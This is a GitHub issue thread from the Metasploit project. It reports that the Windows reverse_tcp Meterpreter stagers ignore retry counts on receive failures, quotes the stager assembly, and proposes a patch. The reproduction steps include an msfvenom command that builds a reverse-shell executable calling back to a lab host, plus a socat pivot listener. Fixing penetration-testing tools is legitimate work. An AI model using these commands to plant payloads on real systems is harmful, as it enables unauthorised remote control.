### ISSUE TITLE
Windows reverse_tcp (x86/64 , rc4 included) payloads not honoring retry counts (infinite loops in some cases)

### ISSUE THREAD

**Issue by EccoTheFlintstone** [rapid7/metasploit-framework#9090]
## Steps to reproduce

box : 192.168.56.101 (pentester machine)
target : 192.168.56.102

1. generate payload on box: **msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=4444 -f exe -o /tmp/msf.exe**
2. deploy msf.exe to target
3. start a socat listener on box    :  **socat -d -d -d tcp-l:4444,fork,reuseaddr tcp:127.0.0.1:5555**
4. start msf.exe on target

socat is used here as a TCP pivot between the target box and the metasploit console
In an engagement, it would be used to pivot out of a client network

## Expected behavior

If nothing listens on port 127.0.0.1:5555, msf.exe on target should bail after "retry_count" attempts

## Current behavior
infinite connection loop, msf.exe never stops connecting, trying to receive data, fails and starts again

## Root cause
reverse_tcp.rb (x86/x64) and reverse_tcp_rc4.rb (x86) do not honor retry_count on "recv" failures

In  **/usr/share/metasploit-framework/lib/msf/core/payload/windows/reverse_tcp.rb**, around line 258 : 

```
        dec [esp]               ; decrement the counter
        ; try again
        jmp create_socket
```

No check is performed on the retry_count counter after decrementing it in case of **recv** failure

On the contrary, it is checked in a **connect** failure (a few lines above): 

```
      handle_connect_failure:
        ; decrement our attempt count and try again
        dec dword [esi+8]
        jnz try_connect
    ^

    if opts[:exitfunk]
      asm << %Q^
      failure:
        call exitfunk
```

## Proposed fix

Patch with 
1. x86 (reverse_tcp and reverse_tcp_rc4)
```
        dec [esp]               ; decrement the counter

        ; try again
        jnz create_socket
	jmp failure
```

2. x64 (reverse_tcp)

```
      ; and try again
        dec r14                 ; decrement the retry count
        jnz create_socket
	jmp failure
```

I'm not sure if this impacts other payloads, haven't been thorough looking at them

### Metasploit version

Framework: 4.16.10-dev
Console  : 4.16.10-dev

### I installed Metasploit with:
- [ x] Kali package via apt

### OS

Kali rolling (2017.02 up to date)

**Comment by busterb** [comment]
I've tested the Linux ones fairly recently and they seemed OK. Thanks!

**Comment by EccoTheFlintstone** [comment]
Linux ones indeed seem fine
problem seems to occur only on windows ones, as per the analysis performed
